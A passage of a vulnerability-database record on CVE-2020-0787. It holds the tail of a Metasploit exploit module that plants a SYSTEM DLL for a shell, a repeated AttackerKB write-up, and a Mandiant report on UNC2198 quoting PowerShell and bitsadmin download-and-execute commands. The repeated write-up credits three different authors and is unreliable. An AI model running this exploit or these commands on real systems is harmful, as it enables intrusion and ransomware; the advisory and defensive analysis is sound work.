register_file_for_cleanup(malicious_dll_location)\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n process = launch_background_injectable_notepad\n\n print_status(\"Injecting DLL into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n dll_info_parameter = malicious_dll_location.to_s\n payload_mem = inject_into_process(process, dll_info_parameter)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('DLL injected. Executing injected DLL...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\")\n sleep datastore['JOB_WAIT_TIME']\n\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.\n # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.\n\n print_status(\"Starting the interactive scan job...\")\n # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n session.shell_command_token('usoclient StartInteractiveScan')\n\n print_status(\"Enjoy the shell!\")\n end\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-09T15:54:40", "description": "# CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\n\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-16T08:57:51", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-08-09T07:26:02", "id": "FACAC587-D738-561E-B976-3A97B6202667", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-06-20T05:04:15", "description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka \u2018Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 10, 2020 2:20am UTC reported:\n\nWrote the Metasploit module for this vulnerability which is currently sitting as a PR at <https://github.com/rapid7/metasploit-framework/pull/13554>. Let me start with an overview of this vulnerability and then explain why I believe this vulnerability is more valuable than it may initially appear to be.\n\nFirst off, as mentioned in other reviews of this bug, you can find the original writeup at <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> and the PoC at <https://github.com/itm4n/BitsArbitraryFileMove>. As described in the blog, the BITS service exposes the `Legacy Control Class` over COM. An attacker can use this to obtain a pointer to the `IBackgroundCopyGroup` interface, which contains two undocumented methods, `QueryJobInterface()` and `SetNotificationPointer()`. By calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` method, the attacker will get a handle to the new `IBackgroundCopyJob` interface.\n\nThe problem here is that the handle to the `IBackgroundCopyJob` group is done without proper impersonation. Normally this would not be an issue since the other methods implement impersonation properly. However there is a catch. When adding a new job using the `IBackgroundCopyJob` interface that was returned via the method described earlier, the temporary file that BITS creates when creating a new job will be renamed via a call to `MoveFileEx()` with the permissions of the `IBackgroundCopyJob` interface. Well since BITS runs as SYSTEM and the `IBackgroundCopyJob` interface didn\u2019t implement impersonation, guess what? Its going to copy the file as the SYSTEM user.\n\nExploitation of this vulnerability is not the most difficult in the world but it basically relies on the following process (described in <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> way better than I can explain it here, but heck I\u2019ll give it a shot):\n\n 1. Set up a temporary directory that will be our staging area and create two folders: Bait and MountPoint inside of it. \n\n 2. Upload the payload DLL within this temporary directory. \n\n 3. Create a symbolic link between MountPoint and Bait. \n\n 4. Create a new job using the `IBackgroundCopyJob` interface, whose handle is obtained by calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` interface, \n\n 5. Since the BITS job will be created in a suspended state, locate the temporary BITS job file, and set a file oplock on it so that our function will be called whenever someone tries to move the file. \n\n 6. Resume the BITS job \n\n 7. Our oplock gets hit. Delete the previous symbolic link, and create a symbolic link between the MountPoint directory and `\\RPC Control\\`. Create two more symbolic links to link the temporary BITS file within the MountPoint directory to the DLL we want to copy, and the sample `test.txt` file we were going to the file to so that it instead points to the protected location we would like the file to be copied to. \n\n 8. Release the oplock, and profit! \n\n\nAgain its probably better you look at the `How to Exploit this Vulnerability?` section of <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> for a better explanation of this, he words it much better than I do.\n\nWith this aside though the next important thing to note is that BITS was introduced with Windows 7, which is reflected in the affected systems listed at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0787>. Looking over this list we can see that every single version of Windows, be it Server or Workstation, is affected by this vulnerability, regardless of architecture.\n\nIn fact further examination of this bug revealed that with the PoC provided, one can very reliably obtain SYSTEM level file copies on nearly any affected machine with no interruption to its service at all. The only downside though is that SYSTEM level file copies alone are not enough to get LPE. To do this an attacker needs to combine this vulnerability with a DLL hijacking vulnerability or some other vulnerability where the placement of an arbitrary file into a protected location would grant the attacker additional privileges.\n\nIn the case of the PoC and the Metasploit module, this is achieved by taking advantage of a bug in the Windows Update Session Orchestrator service, which is well documented at <https://itm4n.github.io/usodllloader-part1/> and <https://itm4n.github.io/usodllloader-part2/>. In a nutshell, an attacker can gain SYSTEM level code execution if they can create the file `C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll` and then run the undocumented command ` usoclient StartScan` or `usoclient StartInteractiveScan`. Note that since the Update Session Orchestrator service only exists on Windows 10 and later, it is only possible to use this technique on those computers. With this being said though other techniques could be used to gain LPE on other Windows systems, it is just a matter of creativity.\n\nThis means that in essence, any Windows system that has not applied the March 2020 updates has a pretty universally accessible arbitrary file copy vulnerability **provided that an attacker already has local access to the system**. The only other limitation is the aforementioned DLL hijacking issue; however should an attacker account for this via vulnerabilities such as the NetMan DLL hijacking issue described at <https://itm4n.github.io/windows-server-netman-dll-hijacking/>, which affects all Windows Server editions from Windows Server 2008 R2 to Windows Server 2019, they could easily adjust this vulnerability to escalate privileges on a wide variety of systems.\n\nIn summary this is one to look out for and I can see this being weaponized in the future, however attackers will need a little bit of work to get a DLL hijacking bug working for each target they want to compromise (not that hard given that Microsoft doesn\u2019t consider DLL hijacking issues a bug and tends not to patch them), and the fact that they need local access (the main limiting factor here).\n\n**bwatters-r7** at March 20, 2020 4:00pm UTC reported:\n\nWrote the Metasploit module for this vulnerability which is currently sitting as a PR at <https://github.com/rapid7/metasploit-framework/pull/13554>. Let me start with an overview of this vulnerability and then explain why I believe this vulnerability is more valuable than it may initially appear to be.\n\nFirst off, as mentioned in other reviews of this bug, you can find the original writeup at <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> and the PoC at <https://github.com/itm4n/BitsArbitraryFileMove>. As described in the blog, the BITS service exposes the `Legacy Control Class` over COM. An attacker can use this to obtain a pointer to the `IBackgroundCopyGroup` interface, which contains two undocumented methods, `QueryJobInterface()` and `SetNotificationPointer()`. By calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` method, the attacker will get a handle to the new `IBackgroundCopyJob` interface.\n\nThe problem here is that the handle to the `IBackgroundCopyJob` group is done without proper impersonation. Normally this would not be an issue since the other methods implement impersonation properly. However there is a catch. When adding a new job using the `IBackgroundCopyJob` interface that was returned via the method described earlier, the temporary file that BITS creates when creating a new job will be renamed via a call to `MoveFileEx()` with the permissions of the `IBackgroundCopyJob` interface. Well since BITS runs as SYSTEM and the `IBackgroundCopyJob` interface didn\u2019t implement impersonation, guess what? Its going to copy the file as the SYSTEM user.\n\nExploitation of this vulnerability is not the most difficult in the world but it basically relies on the following process (described in <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> way better than I can explain it here, but heck I\u2019ll give it a shot):\n\n 1. Set up a temporary directory that will be our staging area and create two folders: Bait and MountPoint inside of it. \n\n 2. Upload the payload DLL within this temporary directory. \n\n 3. Create a symbolic link between MountPoint and Bait. \n\n 4. Create a new job using the `IBackgroundCopyJob` interface, whose handle is obtained by calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` interface, \n\n 5. Since the BITS job will be created in a suspended state, locate the temporary BITS job file, and set a file oplock on it so that our function will be called whenever someone tries to move the file. \n\n 6. Resume the BITS job \n\n 7. Our oplock gets hit. Delete the previous symbolic link, and create a symbolic link between the MountPoint directory and `\\RPC Control\\`. Create two more symbolic links to link the temporary BITS file within the MountPoint directory to the DLL we want to copy, and the sample `test.txt` file we were going to the file to so that it instead points to the protected location we would like the file to be copied to. \n\n 8. Release the oplock, and profit! \n\n\nAgain its probably better you look at the `How to Exploit this Vulnerability?` section of <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> for a better explanation of this, he words it much better than I do.\n\nWith this aside though the next important thing to note is that BITS was introduced with Windows 7, which is reflected in the affected systems listed at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0787>. Looking over this list we can see that every single version of Windows, be it Server or Workstation, is affected by this vulnerability, regardless of architecture.\n\nIn fact further examination of this bug revealed that with the PoC provided, one can very reliably obtain SYSTEM level file copies on nearly any affected machine with no interruption to its service at all. The only downside though is that SYSTEM level file copies alone are not enough to get LPE. To do this an attacker needs to combine this vulnerability with a DLL hijacking vulnerability or some other vulnerability where the placement of an arbitrary file into a protected location would grant the attacker additional privileges.\n\nIn the case of the PoC and the Metasploit module, this is achieved by taking advantage of a bug in the Windows Update Session Orchestrator service, which is well documented at <https://itm4n.github.io/usodllloader-part1/> and <https://itm4n.github.io/usodllloader-part2/>. In a nutshell, an attacker can gain SYSTEM level code execution if they can create the file `C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll` and then run the undocumented command ` usoclient StartScan` or `usoclient StartInteractiveScan`. Note that since the Update Session Orchestrator service only exists on Windows 10 and later, it is only possible to use this technique on those computers. With this being said though other techniques could be used to gain LPE on other Windows systems, it is just a matter of creativity.\n\nThis means that in essence, any Windows system that has not applied the March 2020 updates has a pretty universally accessible arbitrary file copy vulnerability **provided that an attacker already has local access to the system**. The only other limitation is the aforementioned DLL hijacking issue; however should an attacker account for this via vulnerabilities such as the NetMan DLL hijacking issue described at <https://itm4n.github.io/windows-server-netman-dll-hijacking/>, which affects all Windows Server editions from Windows Server 2008 R2 to Windows Server 2019, they could easily adjust this vulnerability to escalate privileges on a wide variety of systems.\n\nIn summary this is one to look out for and I can see this being weaponized in the future, however attackers will need a little bit of work to get a DLL hijacking bug working for each target they want to compromise (not that hard given that Microsoft doesn\u2019t consider DLL hijacking issues a bug and tends not to patch them), and the fact that they need local access (the main limiting factor here).\n\n**xFreed0m** at March 12, 2020 5:28pm UTC reported:\n\nWrote the Metasploit module for this vulnerability which is currently sitting as a PR at <https://github.com/rapid7/metasploit-framework/pull/13554>. Let me start with an overview of this vulnerability and then explain why I believe this vulnerability is more valuable than it may initially appear to be.\n\nFirst off, as mentioned in other reviews of this bug, you can find the original writeup at <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> and the PoC at <https://github.com/itm4n/BitsArbitraryFileMove>. As described in the blog, the BITS service exposes the `Legacy Control Class` over COM. An attacker can use this to obtain a pointer to the `IBackgroundCopyGroup` interface, which contains two undocumented methods, `QueryJobInterface()` and `SetNotificationPointer()`. By calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` method, the attacker will get a handle to the new `IBackgroundCopyJob` interface.\n\nThe problem here is that the handle to the `IBackgroundCopyJob` group is done without proper impersonation. Normally this would not be an issue since the other methods implement impersonation properly. However there is a catch. When adding a new job using the `IBackgroundCopyJob` interface that was returned via the method described earlier, the temporary file that BITS creates when creating a new job will be renamed via a call to `MoveFileEx()` with the permissions of the `IBackgroundCopyJob` interface. Well since BITS runs as SYSTEM and the `IBackgroundCopyJob` interface didn\u2019t implement impersonation, guess what? Its going to copy the file as the SYSTEM user.\n\nExploitation of this vulnerability is not the most difficult in the world but it basically relies on the following process (described in <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> way better than I can explain it here, but heck I\u2019ll give it a shot):\n\n 1. Set up a temporary directory that will be our staging area and create two folders: Bait and MountPoint inside of it. \n\n 2. Upload the payload DLL within this temporary directory. \n\n 3. Create a symbolic link between MountPoint and Bait. \n\n 4. Create a new job using the `IBackgroundCopyJob` interface, whose handle is obtained by calling the `QueryJobInterface()` method of the `IBackgroundCopyGroup` interface, \n\n 5. Since the BITS job will be created in a suspended state, locate the temporary BITS job file, and set a file oplock on it so that our function will be called whenever someone tries to move the file. \n\n 6. Resume the BITS job \n\n 7. Our oplock gets hit. Delete the previous symbolic link, and create a symbolic link between the MountPoint directory and `\\RPC Control\\`. Create two more symbolic links to link the temporary BITS file within the MountPoint directory to the DLL we want to copy, and the sample `test.txt` file we were going to the file to so that it instead points to the protected location we would like the file to be copied to. \n\n 8. Release the oplock, and profit! \n\n\nAgain its probably better you look at the `How to Exploit this Vulnerability?` section of <https://itm4n.github.io/cve-2020-0787-windows-bits-eop/> for a better explanation of this, he words it much better than I do.\n\nWith this aside though the next important thing to note is that BITS was introduced with Windows 7, which is reflected in the affected systems listed at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0787>. Looking over this list we can see that every single version of Windows, be it Server or Workstation, is affected by this vulnerability, regardless of architecture.\n\nIn fact further examination of this bug revealed that with the PoC provided, one can very reliably obtain SYSTEM level file copies on nearly any affected machine with no interruption to its service at all. The only downside though is that SYSTEM level file copies alone are not enough to get LPE. To do this an attacker needs to combine this vulnerability with a DLL hijacking vulnerability or some other vulnerability where the placement of an arbitrary file into a protected location would grant the attacker additional privileges.\n\nIn the case of the PoC and the Metasploit module, this is achieved by taking advantage of a bug in the Windows Update Session Orchestrator service, which is well documented at <https://itm4n.github.io/usodllloader-part1/> and <https://itm4n.github.io/usodllloader-part2/>. In a nutshell, an attacker can gain SYSTEM level code execution if they can create the file `C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll` and then run the undocumented command ` usoclient StartScan` or `usoclient StartInteractiveScan`. Note that since the Update Session Orchestrator service only exists on Windows 10 and later, it is only possible to use this technique on those computers. With this being said though other techniques could be used to gain LPE on other Windows systems, it is just a matter of creativity.\n\nThis means that in essence, any Windows system that has not applied the March 2020 updates has a pretty universally accessible arbitrary file copy vulnerability **provided that an attacker already has local access to the system**. The only other limitation is the aforementioned DLL hijacking issue; however should an attacker account for this via vulnerabilities such as the NetMan DLL hijacking issue described at <https://itm4n.github.io/windows-server-netman-dll-hijacking/>, which affects all Windows Server editions from Windows Server 2008 R2 to Windows Server 2019, they could easily adjust this vulnerability to escalate privileges on a wide variety of systems.\n\nIn summary this is one to look out for and I can see this being weaponized in the future, however attackers will need a little bit of work to get a DLL hijacking bug working for each target they want to compromise (not that hard given that Microsoft doesn\u2019t consider DLL hijacking issues a bug and tends not to patch them), and the fact that they need local access (the main limiting factor here).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-0787 Windows BITS Privesc", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2020-07-30T00:00:00", "id": "AKB:AF37CD6E-8730-4AEF-8679-0413B491A107", "href": "https://attackerkb.com/topics/kj4yuqlCc1/cve-2020-0787-windows-bits-privesc", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T02:03:43", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \u201cWindows COM Elevation of Privilege Vulnerability\u201d. This CVE ID is unique from CVE-2017-0214.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2021-07-27T00:00:00", "id": "AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "href": "https://attackerkb.com/topics/1PgDqHxZcV/cve-2017-0213", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-29T00:23:57", "description": "Mandiant Advanced Practices (AP) closely tracks the shifting tactics, techniques, and procedures (TTPs) of financially motivated groups who severely disrupt organizations with ransomware. In May 2020, FireEye released a blog post detailing intrusion tradecraft associated with the deployment of MAZE. As of publishing this post, we track 11 distinct groups that have deployed MAZE ransomware. At the close of 2020, we noticed a shift in a subset of these groups that have started to deploy EGREGOR ransomware in favor of MAZE ransomware following access acquired from ICEDID infections.\n\nSince its discovery in 2017 as a banking trojan, ICEDID evolved into a pernicious point of entry for financially motivated actors to conduct intrusion operations. In earlier years, ICEDID was deployed to primarily target banking credentials. In 2020 we observed adversaries using ICEDID more explicitly as a tool to enable access to impacted networks, and in many cases this was leading to the use of common post-exploitation frameworks and ultimately the deployment of ransomware. This blog post shines a heat lamp on the latest tradecraft of UNC2198, who_ _used ICEDID infections to deploy MAZE or EGREGOR ransomware.\n\n#### Building an Igloo: ICEDID Infections\n\nSeparate phases of intrusions are attributed to different uncategorized (UNC) groups when discrete operations such as obtaining access are not part of a contiguous operation. Pure \u201caccess operations\u201d establish remote access into a target environment for follow on operations actioned by a separate group. A backdoor deployed to establish an initial foothold for another group is an example of an access operation.\n\nBetween July and December 2020, an ICEDID phishing infection chain consisted of a multi-stage process involving MOUSEISLAND and PHOTOLOADER (Figure 1).\n\nFigure 1: Example UNC2420 MOUSEISLAND to ICEDID Infection Chain\n\nMOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email (Figure 2). Based on our intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID. Mandiant attributes the MOUSEISLAND distribution of PHOTOLOADER and other payloads to [UNC2420](<https://advantage.mandiant.com/actors/threat-actor--843f8aa0-2305-579a-a08a-f2f88f7815d1>), a distribution threat cluster created by Mandiant\u2019s Threat Pursuit team. UNC2420 activity shares overlaps with the publicly reported nomenclature of \u201c_Shathak_\u201d or \u201c_TA551_\u201d.\n\nFigure 2: UNC2420 MOUSEISLAND Phishing Email\n\n#### Ice, Ice, BEACON...UNC2198\n\nAlthough analysis is always ongoing, at the time of publishing this blog post, Mandiant tracks multiple distinct threat clusters (UNC groups) of various sizes that have used ICEDID as a foothold to enable intrusion operations. The most prominent of these threat clusters is [UNC2198](<https://advantage.mandiant.com/actors/threat-actor--6fd29c05-9c32-578a-83d8-051f89ebf30b>), a group that has targeted organizations in North America across a breadth of industries. In at least five cases, UNC2198 acquired initial access from UNC2420 MOUSEISLAND to conduct intrusion operations. In 2020, Mandiant attributed nine separate intrusions to UNC2198. UNC2198\u2019s objective is to monetize their intrusions by compromising victim networks with ransomware._ _In July 2020, Mandiant observed UNC2198 leverage network access provided by an ICEDID infection to encrypt an environment with MAZE ransomware. As the year progressed into October and November, we observed UNC2198 shift from deploying MAZE to using EGREGOR ransomware during another Incident Response engagement. Like MAZE, EGREGOR is operated using an [affiliate model](<https://advantage.mandiant.com/reports/20-00022696>), where affiliates who deploy EGREGOR are provided with proceeds following successful encryption and extortion for payment.\n\nThe UNC2198 cluster expanded over the course of more than six months. Mandiant\u2019s December 2020 blog post on UNCs described the analytical tradecraft we use to merge and graduate clusters of activity. Merging UNCs is a substantial analytical practice in which indicators and tradecraft attributed to one group are scrutinized against another. Two former UNCs that shared similar modus operandi were eventually merged into UNC2198.\n\n#### The Snowball Effect of Attribution\n\nAP created UNC2198 based on a single intrusion in June 2020 involving ICEDID, BEACON, SYSTEMBC and WINDARC. UNC2198 compromised 32 systems in 26 hours during this incident; however, ransomware was not deployed. Throughout July 2020 we attributed three intrusions to UNC2198 from Incident Response engagements, including one resulting in the deployment of MAZE ransomware. In October 2020, a slew of activity at both Incident Response engagements and Managed Defense clients resulted in the creation of two new UNC groups, and another incident attributed to UNC2198.\n\nOne of the new UNC groups created in October 2020 was given the designation UNC2374. UNC2374 began as its own distinct cluster where BEACON, WINDARC, and SYSTEMBC were observed during an incident at a Managed Defense customer. Initial similarities in tooling did not constitute a strong enough link to merge UNC2374 with UNC2198 yet.\n\nTwo and a half months following the creation of UNC2374, we amassed enough data points to merge UNC2374 into UNC2198. Some of the data points used in merging UNC2374 into UNC2198 include:\n\n * UNC2198 and UNC2374 Cobalt Strike Team Servers used self-signed certificates with the following subject on TCP port 25055:\n\nC = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com \n \n--- \n \n * UNC2198 and UNC2374 deployed WINDARC malware to identical file paths: _%APPDATA%\\teamviewers\\msi.dll_\n * The same code signing certificate used to sign an UNC2198 BEACON loader was used to sign two UNC2374 SYSTEMBC tunneler payloads.\n * UNC2374 and UNC2198 BEACON C2 servers were accessed by the same victim system within a 10-minute time window during intrusion operations.\n\nThe other UNC group created in October 2020 was given the designation UNC2414. Three separate intrusions were attributed to UNC2414, and as the cluster grew, we surfaced similarities between UNC2414 and UNC2198. A subset of the data points used to merge UNC2414 into UNC2198 include:\n\n * UNC2198 and UNC2414 BEACON servers used self-signed certificates using the following subject on TCP port 25055:\n\nC = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com \n \n--- \n \n * UNC2198 and UNC2414 installed BEACON as _C:\\Windows\\int32.dll_\n * UNC2198 and UNC2414 installed the RCLONE utility as _C:\\Perflogs\\rclone.exe_\n * UNC2198 and UNC2414 were proven to be financially motivated actors that had leveraged ICEDID as initial access: \n * UNC2198 had deployed MAZE\n * UNC2414 had deployed EGREGOR\n\nThe merge between UNC2198 and UNC2414 was significant because it revealed UNC2198 has access to EGREGOR ransomware. The timing of the EGREGOR usage is also consistent with MAZE ransomware shutting down as [reported](<https://advantage.mandiant.com/reports/20-00022696>) by Mandiant Intelligence. Figure 3 depicts the timeline of related intrusions and merges into UNC2198.\n\nFigure 3: UNC2198 timeline\n\n#### UNC2198 Intrusion Flow: After Initial Access\n\nExpanding the UNC2198 cluster through multiple intrusions and merges with other UNC groups highlights the range of TTPs employed. We have pulled out some key data from all our UNC2198 intrusions to illustrate an amalgamation of capabilities used by the threat actor.\n\n_Establish Foothold_\n\nAfter obtaining access, UNC2198 has deployed additional malware using various techniques. For instance, UNC2198 used _InnoSetup _droppers to install a WINDARC backdoor on the target host. UNC2198 also used BITS Jobs and remote PowerShell downloads to download additional tools like SYSTEMBC for proxy and tunneler capabilities. Example commands for download and execution are:\n\n%COMSPEC% /C echo bitsadmin /transfer 257e http://<REDACTED>/<REDACTED>.exe %APPDATA%<REDACTED>.exe & %APPDATA%<REDACTED>.exe & del %APPDATA% <REDACTED>.exe ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\FmpaXUHFennWxPIM.txt > \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\MwUgqKjEDjCMDGmC.bat\n\n%COMSPEC% /C echo powershell.exe -nop -w hidden -c (new-object System.Net.WebClient).Downloadfile(http://<REDACTED>/<REDACTED>.exe, <REDACTED>.exe) ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\AVaNbBXzKyxktAZI.txt > \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\yoKjaqTIzJhdDLjD.bat \n \n--- \n \nUNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE_ _offensive security tools_ _during this phase as well.\n\n_Offensive Security Tooling_\n\nUNC2198 has used offensive security tools similarly seen across many threat actors. UNC2198 has used BEACON in roughly 90% of their intrusions. UNC2198 installs and executes Cobalt Strike BEACON in a variety of ways, including shellcode loaders using PowerShell scripts, service executables, and DLLs. While the ways and means of using BEACON are not inherently unique, there are still aspects to extrapolate that shed light on UNC2198 TTPs.\n\nFocusing in on specific BEACON executables tells a different story beyond the use of the tool itself. Aside from junk code and API calls, UNC2198 BEACON and METERPRETER executables often exhibit unique characteristics of malware packaging, including odd command-line arguments visible within strings and upon execution via child processes:\n\ncmd.exe /c echo TjsfoRdwOe=9931 & reg add HKCU\\SOFTWARE\\WIlumYjNSyHob /v xFCbJrNfgBNqRy /t REG_DWORD /d 3045 & exit\n\ncmd.exe /c echo ucQhymDRSRvq=1236 & reg add HKCU\\\\\\SOFTWARE\\\\\\YkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD /d 9633 & exit\n\ncmd.exe /c set XlOLqhCejHbSNW=8300 & reg add HKCU\\SOFTWARE\\WaMgGneKhtgTTy /v LbmWADsevLywrkP /t REG_DWORD /d 3809 & exit \n \n--- \n \nThese example commands are non-functional, as they do not modify or alter payload execution.\n\nAnother technique involves installing BEACON using a file path containing mixed Unicode-escaped and ASCII characters to evade detection:\n\n**Unicode Escaped**\n\n| \n\nC:\\ProgramData\\S\\u0443sH\\u0435\\u0430ls\\T\\u0430s\\u0441host.exe \n \n---|--- \n \n**Unicode Unescaped**\n\n| \n\nC:\\ProgramData\\S\u0443sH\u0435\u0430ls\\T\u0430s\u0441host.exe \n \nThe executable was then executed by using a Scheduled Task named _shadowdev_:\n\ncmd.exe /c schtasks /create /sc minute /mo 1 /tn shadowdev /tr C:\\\\\\ProgramData\\\\\\S\\u0443sH\\u0435\\u0430ls\\\\\\T\\u0430s\\u0441host.exe \n \n--- \n \nWhile the previous examples are related to compiled executables, UNC2198 has also used simple PowerShell download cradles to execute Base64-encoded and compressed BEACON stagers in memory:\n\npowershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://5.149.253[.]199:80/auth'))\n\npowershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(\"hxxp://185.106.122[.]167:80/a\"))\n\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://195.123.233[.]157:80/casino'))\" \n \n--- \n \n_Discovery and Reconnaissance_\n\nUNC2198 has exhibited common TTPs seen across many threat groups during discovery and reconnaissance activities. UNC2198 has used the BloodHound active directory mapping utility_ _during intrusions from within the \u201cC:\\ProgramData\u201d and \u201cC:\\Temp\u201d directories.\n\nThe following are collective examples of various commands executed by UNC2198 over time to enumerate a compromised environment:\n\narp -a \nwhoami /groups \nwhoami.exe /groups /fo csv \nwhoami /all\n\nnet user 